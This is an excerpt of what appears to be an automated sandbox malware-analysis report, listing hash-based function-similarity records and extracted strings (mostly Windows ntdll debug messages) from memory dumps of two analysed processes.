                                                                                                                                                              • Instruction Fuzzy Hash: 5090023120544846D140759D4804A460055A7D0715F59C415A0064A94DD6668E55B761
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: eaccbfcb8a2d2c9729f54a1a3135bbad6b1d5dc004e76ea4806d005569c6ccb5
                                                                                                                                                              • Instruction ID: def8b0c9827b6726b0296b1c1d1d02c0ff74de9787a2567dd69854dc0308eab6
                                                                                                                                                              • Opcode Fuzzy Hash: eaccbfcb8a2d2c9729f54a1a3135bbad6b1d5dc004e76ea4806d005569c6ccb5
                                                                                                                                                              • Instruction Fuzzy Hash: 8B90023120140806D104759D4C046860045A7D0711F59C415A6024A55ED6A689917231
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 46db4eb606d44d0a9d52b47cbad579ea246d9605a13712a8a342f29e597ca952
                                                                                                                                                              • Instruction ID: a7883d03770db2565a3b0875c7d8b52a70072dca0fbc160183749a728b40c12e
                                                                                                                                                              • Opcode Fuzzy Hash: 46db4eb606d44d0a9d52b47cbad579ea246d9605a13712a8a342f29e597ca952
                                                                                                                                                              • Instruction Fuzzy Hash: 1290023160540806D150759D48147460045A7D0711F59C415A0024A54DC7968B5577A1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 349222239b197da7d7fa09a2ec65d595c07cfd84ec6fe7ef2a6bc4677e9e86bb
                                                                                                                                                              • Instruction ID: 19151822e5a29d51f082ab2fb4742f7fc20fc5022c494b39219a3913818dae3c
                                                                                                                                                              • Opcode Fuzzy Hash: 349222239b197da7d7fa09a2ec65d595c07cfd84ec6fe7ef2a6bc4677e9e86bb
                                                                                                                                                              • Instruction Fuzzy Hash: 7F900225211400070105B99D0B045070086A7D5761359C425F1015950CD66289615221
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 5b976b9c8a6c2e52994bb1f62022eb47799d540c907dc195aec84bde9b3e5e01
                                                                                                                                                              • Instruction ID: a4f53cf46e9dea7680e3665ffe43630d0a937006d697888892348f056821495b
                                                                                                                                                              • Opcode Fuzzy Hash: 5b976b9c8a6c2e52994bb1f62022eb47799d540c907dc195aec84bde9b3e5e01
                                                                                                                                                              • Instruction Fuzzy Hash: 80900225221400060145B99D0A0450B0485B7D6761399C419F1416990CC66289655321
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: ad0eae349bbe5755e26b7a953716292ee9a959031b7a6555091886b58681b78d
                                                                                                                                                              • Instruction ID: cbb99a4a6244a3fc36e7f96dffa782efde26c2bb5687d30bbbeece4835bee493
                                                                                                                                                              • Opcode Fuzzy Hash: ad0eae349bbe5755e26b7a953716292ee9a959031b7a6555091886b58681b78d
                                                                                                                                                              • Instruction Fuzzy Hash: F9900221211C0046D20079AD4C14B070045A7D0713F59C519A0154954CC95689615621
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 7b56aabca51eb01789ac33a004d2a6b3b73a0d474acc7fb61495f9275672aa03
                                                                                                                                                              • Instruction ID: f3c0f512890dc2171510418aa5e21f31723f1afa4a82d657e5a3e39ecdfad4d4
                                                                                                                                                              • Opcode Fuzzy Hash: 7b56aabca51eb01789ac33a004d2a6b3b73a0d474acc7fb61495f9275672aa03
                                                                                                                                                              • Instruction Fuzzy Hash: 2F90023120180406D100759D4C1470B0045A7D0712F59C415A1164955DC66689516671
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 8e3840060d7773c2d94b86e56c624f00f29337df863b444d90ffba8a872361c5
                                                                                                                                                              • Instruction ID: a68c5fd0d46f3d64cdbbeeb9e7404b21d17a55bef6d7ca6a799c6ade40c97556
                                                                                                                                                              • Opcode Fuzzy Hash: 8e3840060d7773c2d94b86e56c624f00f29337df863b444d90ffba8a872361c5
                                                                                                                                                              • Instruction Fuzzy Hash: A690022160140046414075AD8C449064045BBE1621759C525A0998950DC59A89655765
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: b063072e4f95b2da74a7ff45ee4c514d1db58980683e4da7ab4af81b9c2038fd
                                                                                                                                                              • Instruction ID: 50543cfa3b10ff94586cc70d707a79959f1872dbdf59b81bf2e0bdf83ea6a74a
                                                                                                                                                              • Opcode Fuzzy Hash: b063072e4f95b2da74a7ff45ee4c514d1db58980683e4da7ab4af81b9c2038fd
                                                                                                                                                              • Instruction Fuzzy Hash: 6590023120180406D100759D4C087470045A7D0712F59C415A5164955EC6A6C9916631
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: c901eadf53ea08e55180301ec47573158d395f945c498c3968153ec28adf6a3a
                                                                                                                                                              • Instruction ID: 115b949022054c1f699773aca08d775fb17994c8243ddd6d74ea0d99e823a523
                                                                                                                                                              • Opcode Fuzzy Hash: c901eadf53ea08e55180301ec47573158d395f945c498c3968153ec28adf6a3a
                                                                                                                                                              • Instruction Fuzzy Hash: 9690022130140406D102759D48146060049E7D1755F99C416E1424955DC6668A53A232
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 312a869fa733fe860a179d19dc458dab31b4bee5260c76b5e0a047cfe594ea74
                                                                                                                                                              • Instruction ID: 9008061171d8ec44ba6de810396f5fe5292e2faba51d24a0d26189a6f4ad4c9b
                                                                                                                                                              • Opcode Fuzzy Hash: 312a869fa733fe860a179d19dc458dab31b4bee5260c76b5e0a047cfe594ea74
                                                                                                                                                              • Instruction Fuzzy Hash: 3590026120180407D140799D4C046070045A7D0712F59C415A2064955ECA6A8D516235
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: fe4d07ebdc781cc8b442759cbaa522e1dbbcb87ff847a8f2e564abd3e1fd5c66
                                                                                                                                                              • Instruction ID: e6cb7c986f0acb9dedff162880add51d0ca0a9ec406eb394a88e550e4ef930f2
                                                                                                                                                              • Opcode Fuzzy Hash: fe4d07ebdc781cc8b442759cbaa522e1dbbcb87ff847a8f2e564abd3e1fd5c66
                                                                                                                                                              • Instruction Fuzzy Hash: B590022160140506D101759D4804616004AA7D0651F99C426A1024955ECA668A92A231
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: d180db77d08a8604bf0be5857c7dc2b8a4e46fc03c1b1137438261a9cd00b6cc
                                                                                                                                                              • Instruction ID: ec3cd42797eb485048d30d88e9a538fadee9b3738b7816c18df2fe4141ba329a
                                                                                                                                                              • Opcode Fuzzy Hash: d180db77d08a8604bf0be5857c7dc2b8a4e46fc03c1b1137438261a9cd00b6cc
                                                                                                                                                              • Instruction Fuzzy Hash: 9E90027120140406D140759D48047460045A7D0711F59C415A5064954EC69A8ED56765
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: af1cbb99dba1515c841841c6f6ceef33a05dfcb98cd69c9e3fe07ac45a9f5457
                                                                                                                                                              • Instruction ID: 9f1967f865f8ba18329c7cdc98ba8b76b0e7368f62468e4c122409d11259633b
                                                                                                                                                              • Opcode Fuzzy Hash: af1cbb99dba1515c841841c6f6ceef33a05dfcb98cd69c9e3fe07ac45a9f5457
                                                                                                                                                              • Instruction Fuzzy Hash: CC90022120184446D140769D4C04B0F4145A7E1612F99C41DA4156954CC95689555721
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 71857e7fab6f6527a71be0ca0f56d9d87551c79cfd3426868a4d702536af8112
                                                                                                                                                              • Instruction ID: 120daaa2bcff8adb8a2b252dc845124100ea60ebb8a22f47714b061f720dde27
                                                                                                                                                              • Opcode Fuzzy Hash: 71857e7fab6f6527a71be0ca0f56d9d87551c79cfd3426868a4d702536af8112
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                                                              • Opcode ID: e46c770cf7f0feb3bb708ba913f630ed604dac8146443377ded0d1e8afc9145b
                                                                                                                                                              • Instruction ID: ced4f857d53951c24ebaf2f0cf68a2d70c81092753a44e75f4c6127723dd39a4
                                                                                                                                                              • Opcode Fuzzy Hash: e46c770cf7f0feb3bb708ba913f630ed604dac8146443377ded0d1e8afc9145b
                                                                                                                                                              • Instruction Fuzzy Hash: 1A51D8B5A00216AFCB15DFAC88D49BEFBF8BB48240B548569F469DB641D334EE5087E0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                                                              • Opcode ID: 758cc9dac00a8143e3e25cb2e5b62403230e4d788ca8c1854c31e5982589cdbf
                                                                                                                                                              • Instruction ID: fc390ad8068c5e287c176cfa9bb7c7f381ad423e6b953248e03823dcaf56d546
                                                                                                                                                              • Opcode Fuzzy Hash: 758cc9dac00a8143e3e25cb2e5b62403230e4d788ca8c1854c31e5982589cdbf
                                                                                                                                                              • Instruction Fuzzy Hash: A851F475A00A66AFDB31DF9CCCA097EBBF9AB44200B04845DE496DB681E774DA408B60
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 015E46FC
                                                                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 015E4655
                                                                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 015E4725
                                                                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 015E4742
                                                                                                                                                              • ExecuteOptions, xrefs: 015E46A0
                                                                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 015E4787
                                                                                                                                                              • Execute=1, xrefs: 015E4713
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                              • API String ID: 0-484625025
                                                                                                                                                              • Opcode ID: f80b753b09ebcfa3340154666dcb854e807a69264f6ff05d137fc3eb11c99fda
                                                                                                                                                              • Instruction ID: 2eec66c2ba833380082d96f16abcc55b21f4fe93f933b1371d8e92c5a0142584
                                                                                                                                                              • Opcode Fuzzy Hash: f80b753b09ebcfa3340154666dcb854e807a69264f6ff05d137fc3eb11c99fda
                                                                                                                                                              • Instruction Fuzzy Hash: FB510C31A4021A7AEF21EB68DC95FED7BF8BF58304F440099D605AF191D7729A418F50
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __aulldvrm
                                                                                                                                                              • String ID: +$-$0$0
                                                                                                                                                              • API String ID: 1302938615-699404926
                                                                                                                                                              • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                              • Instruction ID: 8241920b243fd5b58ba335ec421d417d5ea687194f0a99765e19443f72ae9605
                                                                                                                                                              • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                              • Instruction Fuzzy Hash: AA81A270E052499EEF25CE6CC8D17FEBBB1BF45320F28465AE851AF291C7B49940CB51
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                              • String ID: %%%u$[$]:%u
                                                                                                                                                              • API String ID: 48624451-2819853543
                                                                                                                                                              • Opcode ID: ecefe437a9dbb1cb251bcb4b4bbe01b1aff5eb8fce92b3d469be8c4b0eb69a41
                                                                                                                                                              • Instruction ID: f22ea5e4a1f9cc605b4f62d35fbf1ecbd3b14f1990ea961ee98b366ee4962923
                                                                                                                                                              • Opcode Fuzzy Hash: ecefe437a9dbb1cb251bcb4b4bbe01b1aff5eb8fce92b3d469be8c4b0eb69a41
                                                                                                                                                              • Instruction Fuzzy Hash: 3B21657AA0052AABDB10DF79CC54EEE7BF8EF54641F54011AEA05E7240EB30DA118BA1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 015E02BD
                                                                                                                                                              • RTL: Re-Waiting, xrefs: 015E031E
                                                                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 015E02E7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                              • API String ID: 0-2474120054
                                                                                                                                                              • Opcode ID: 4d4c0fac548d23e577b58a5081d407a5794730a5ff10c8b1d7426a6383142948
                                                                                                                                                              • Instruction ID: 1c5f6947e480d25751c479d787b4b773511a9b7a4ba0f231a752606b9d9e3240
                                                                                                                                                              • Opcode Fuzzy Hash: 4d4c0fac548d23e577b58a5081d407a5794730a5ff10c8b1d7426a6383142948
                                                                                                                                                              • Instruction Fuzzy Hash: 3AE19F706047429FDB29CF28C884B6ABBE1BB88314F140A5EF5A5CF2E1D7B4D945CB52
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 015E7B7F
                                                                                                                                                              • RTL: Re-Waiting, xrefs: 015E7BAC
                                                                                                                                                              • RTL: Resource at %p, xrefs: 015E7B8E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                              • API String ID: 0-871070163
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015E728C
                                                                                                                                                              Strings
                                                                                                                                                              • RTL: Re-Waiting, xrefs: 015E72C1
                                                                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 015E7294
                                                                                                                                                              • RTL: Resource at %p, xrefs: 015E72A3
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                              • API String ID: 885266447-605551621
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                              • String ID: %%%u$]:%u
                                                                                                                                                              • API String ID: 48624451-3050659472
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __aulldvrm
                                                                                                                                                              • String ID: +$-
                                                                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $$@
                                                                                                                                                              • API String ID: 0-1194432280
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: !$"n$#$$0d$3W$3e$5$5x$8'$?I$@F$C$DN$F$Fe$G$Kd$QX$XG$Y$Ym$]$^.$_UFe$`$e$ee$g$i$kq$myD_UFe$p$r$s$s$ue
                                                                                                                                                              • API String ID: 0-3119237632
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 6$O$S$\$s
                                                                                                                                                              • API String ID: 0-3854637164
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
